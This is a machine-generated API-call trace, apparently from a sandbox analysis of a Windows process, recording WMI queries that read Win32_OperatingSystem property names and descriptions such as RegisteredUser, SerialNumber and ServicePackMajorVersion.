	[0111.344] IWbemClassObject:Get (in: This=0x2ad2069e730, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0ec0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad20632f20, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.344] SafeArrayGetLBound (in: psa=0x2ad206b0ec0, nDim=0x1, plLbound=0xd7edd8f164 | out: plLbound=0xd7edd8f164) returned 0x0
	[0111.344] SafeArrayGetUBound (in: psa=0x2ad206b0ec0, nDim=0x1, plUbound=0xd7edd8f168 | out: plUbound=0xd7edd8f168) returned 0x0
	[0111.344] SafeArrayGetElement (in: psa=0x2ad206b0ec0, rgIndices=0xd7edd8f140, pv=0xd7edd8f138 | out: pv=0xd7edd8f138) returned 0x0
	[0111.344] IWbemClassObject:Get (in: This=0x2ad206a4d50, wszName="Name", lFlags=0, pVal=0xd7edd8f180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f180*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.345] IWbemClassObject:Get (in: This=0x2ad206a4d50, wszName="QualifierValue", lFlags=0, pVal=0xd7edd8f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1b8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0e00*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad206338e0, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.345] SafeArrayGetLBound (in: psa=0x2ad206b0e00, nDim=0x1, plLbound=0xd7edd8f15c | out: plLbound=0xd7edd8f15c) returned 0x0
	[0111.345] SafeArrayGetUBound (in: psa=0x2ad206b0e00, nDim=0x1, plUbound=0xd7edd8f158 | out: plUbound=0xd7edd8f158) returned 0x0
	[0111.345] lstrlenW (lpString="CIMTYPE") returned 7
	[0111.345] lstrlenW (lpString="Values") returned 6
	[0111.345] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.345] lstrlenW (lpString="read") returned 4
	[0111.345] lstrlenW (lpString="Values") returned 6
	[0111.345] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0111.345] lstrlenW (lpString="write") returned 5
	[0111.345] lstrlenW (lpString="Values") returned 6
	[0111.345] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0111.345] lstrlenW (lpString="In") returned 2
	[0111.345] lstrlenW (lpString="Values") returned 6
	[0111.345] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0111.345] lstrlenW (lpString="Out") returned 3
	[0111.345] lstrlenW (lpString="Values") returned 6
	[0111.345] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0111.345] SafeArrayGetElement (in: psa=0x2ad206b0e00, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.345] SafeArrayGetElement (in: psa=0x2ad206b0e00, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.346] SafeArrayGetElement (in: psa=0x2ad206b0e00, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.346] IUnknown:Release (This=0x2ad206a4d50) returned 0x1
	[0111.346] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.347] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.347] SysStringLen (param_1="Description") returned 0xb
	[0111.347] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.347] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.347] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.347] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.347] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.347] SysStringLen (param_1="OSType") returned 0x6
	[0111.347] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.347] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.347] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.347] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.347] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.347] SysStringLen (param_1="Primary") returned 0x7
	[0111.347] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.347] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.347] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.347] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.347] IUnknown:Release (This=0x2ad2069e730) returned 0x1
	[0111.347] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.348] IWbemClassObject:Get (in: This=0x2ad2069b980, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b29a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.349] IWbemClassObject:Get (in: This=0x2ad2069b980, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b2bb8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.349] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.350] IWbemClassObject:Get (in: This=0x2ad2069b980, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The RegisteredUser property indicates the name of the registered user of the operating system./nExample: Jane Doe", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.350] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.350] lstrlenA (lpString="") returned 0
	[0111.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c1f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.351] SysStringLen (param_1="The RegisteredUser property indicates the name of the registered user of the operating system./nExample: Jane Doe") returned 0x71
	[0111.351] SysStringLen (param_1="") returned 0x0
	[0111.351] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.351] IWbemClassObject:Get (in: This=0x2ad2069b980, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.351] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.352] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.352] SysStringLen (param_1="Description") returned 0xb
	[0111.352] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.352] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.352] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.352] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.352] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.352] SysStringLen (param_1="OSType") returned 0x6
	[0111.352] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.352] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.352] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.352] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.352] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.352] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.352] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.352] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.352] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.352] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.352] IUnknown:Release (This=0x2ad2069b980) returned 0x1
	[0111.352] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.353] IWbemClassObject:Get (in: This=0x2ad2069e9e0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0e78, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.353] IWbemClassObject:Get (in: This=0x2ad2069e9e0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0678, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.353] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.353] IWbemClassObject:Get (in: This=0x2ad2069e9e0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The SerialNumber property indicatesthe operating system product serial identification number./nExample:10497-OEM-0031416-71674.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.353] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.354] lstrlenA (lpString="") returned 0
	[0111.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c210, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.354] SysStringLen (param_1="The SerialNumber property indicatesthe operating system product serial identification number./nExample:10497-OEM-0031416-71674.") returned 0x7f
	[0111.354] SysStringLen (param_1="") returned 0x0
	[0111.354] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.354] IWbemClassObject:Get (in: This=0x2ad2069e9e0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.355] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.355] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.355] SysStringLen (param_1="Description") returned 0xb
	[0111.355] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.355] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.355] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.355] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.355] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.355] SysStringLen (param_1="OSType") returned 0x6
	[0111.355] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.355] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.355] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.355] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.355] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.355] SysStringLen (param_1="QuantumType") returned 0xb
	[0111.355] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.355] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.355] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.355] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.356] IUnknown:Release (This=0x2ad2069e9e0) returned 0x1
	[0111.356] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.356] IWbemClassObject:Get (in: This=0x2ad2069aec0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0678, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.356] IWbemClassObject:Get (in: This=0x2ad2069aec0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b13f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.357] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.357] IWbemClassObject:Get (in: This=0x2ad2069aec0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ServicePackMajorVersion property indicates the major version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMajorVersion is valid for computers running Windows 2000 and later (NULL otherwise).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.357] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.357] lstrlenA (lpString="") returned 0
	[0111.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c130, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.358] SysStringLen (param_1="The ServicePackMajorVersion property indicates the major version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMajorVersion is valid for computers running Windows 2000 and later (NULL otherwise).") returned 0x117
	[0111.358] SysStringLen (param_1="") returned 0x0
	[0111.358] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.358] IWbemClassObject:Get (in: This=0x2ad2069aec0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.358] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.359] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.359] SysStringLen (param_1="Description") returned 0xb
	[0111.359] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.359] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.359] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.359] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.359] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.359] SysStringLen (param_1="OSType") returned 0x6
	[0111.359] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.359] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.359] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.359] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.359] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.359] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.359] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.359] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.359] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.359] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.359] IUnknown:Release (This=0x2ad2069aec0) returned 0x1
	[0111.359] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.360] IWbemClassObject:Get (in: This=0x2ad2069bee0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206adc28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.360] IWbemClassObject:Get (in: This=0x2ad2069bee0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ae128, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.360] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.361] IWbemClassObject:Get (in: This=0x2ad2069bee0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ServicePackMinorVersion property indicates the minor version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMinorVersion is valid for computers running Windows 2000 and later (NULL otherwise).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.361] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.361] lstrlenA (lpString="") returned 0
	[0111.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c100, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.362] SysStringLen (param_1="The ServicePackMinorVersion property indicates the minor version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMinorVersion is valid for computers running Windows 2000 and later (NULL otherwise).") returned 0x117
	[0111.362] SysStringLen (param_1="") returned 0x0
	[0111.362] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.362] IWbemClassObject:Get (in: This=0x2ad2069bee0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.362] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.362] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.362] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.362] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.362] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.362] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.362] SysStringLen (param_1="OSType") returned 0x6
	[0111.362] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.362] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.362] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.362] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.363] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.363] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.363] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.363] SysStringLen (param_1="SerialNumber") returned 0xc
	[0111.363] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.363] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.363] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.363] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.363] IUnknown:Release (This=0x2ad2069bee0) returned 0x1
	[0111.363] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.363] IWbemClassObject:Get (in: This=0x2ad2069c190, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ae128, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.363] IWbemClassObject:Get (in: This=0x2ad2069c190, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ae538, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.365] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.365] IWbemClassObject:Get (in: This=0x2ad2069c190, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The total number of kilobytes that can be stored in the operating system's paging files. Note that this number does not represent the actual physical size of the paging file on disk.  0 indicates that there are no paging files.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.365] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.366] lstrlenA (lpString="") returned 0
	[0111.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c100, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.366] SysStringLen (param_1="The total number of kilobytes that can be stored in the operating system's paging files. Note that this number does not represent the actual physical size of the paging file on disk.  0 indicates that there are no paging files.") returned 0xe3
	[0111.366] SysStringLen (param_1="") returned 0x0
	[0111.366] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.366] IWbemClassObject:Get (in: This=0x2ad2069c190, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.367] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.367] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0111.367] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.367] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0111.367] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.367] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0111.367] SysStringLen (param_1="OSType") returned 0x6
	[0111.367] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0111.367] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.367] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0111.367] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.367] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0111.367] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0111.367] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0111.367] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0111.367] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0111.367] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.367] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0111.367] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0111.368] IUnknown:Release (This=0x2ad2069c190) returned 0x1
	[0111.368] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.368] IWbemClassObject:Get (in: This=0x2ad206a6020, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ae538, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.368] IWbemClassObject:Get (in: This=0x2ad206a6020, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ad7c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.368] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.368] IWbemClassObject:Get (in: This=0x2ad206a6020, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Status property is a string indicating the current status of the object. Various operational and non-operational statuses can be defined. Operational statuses are \"OK\", \"Degraded\" and \"Pred Fail\". \"Pred Fail\" indicates that an element may be functioning properly but predicting a failure in the near future. An example is a SMART-enabled hard drive. Non-operational statuses can also be specified. These are \"Error\", \"Starting\", \"Stopping\" and \"Service\". The latter, \"Service\", could apply during mirror-resilvering of a disk, reload of a user permissions list, or other administrative work. Not all such work is on-line, yet the managed element is neither \"OK\" nor in one of the other states.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.369] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.369] lstrlenA (lpString="") returned 0
	[0111.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0c0, cchWideChar=1 | out: lpWideCharStr="") returned 1
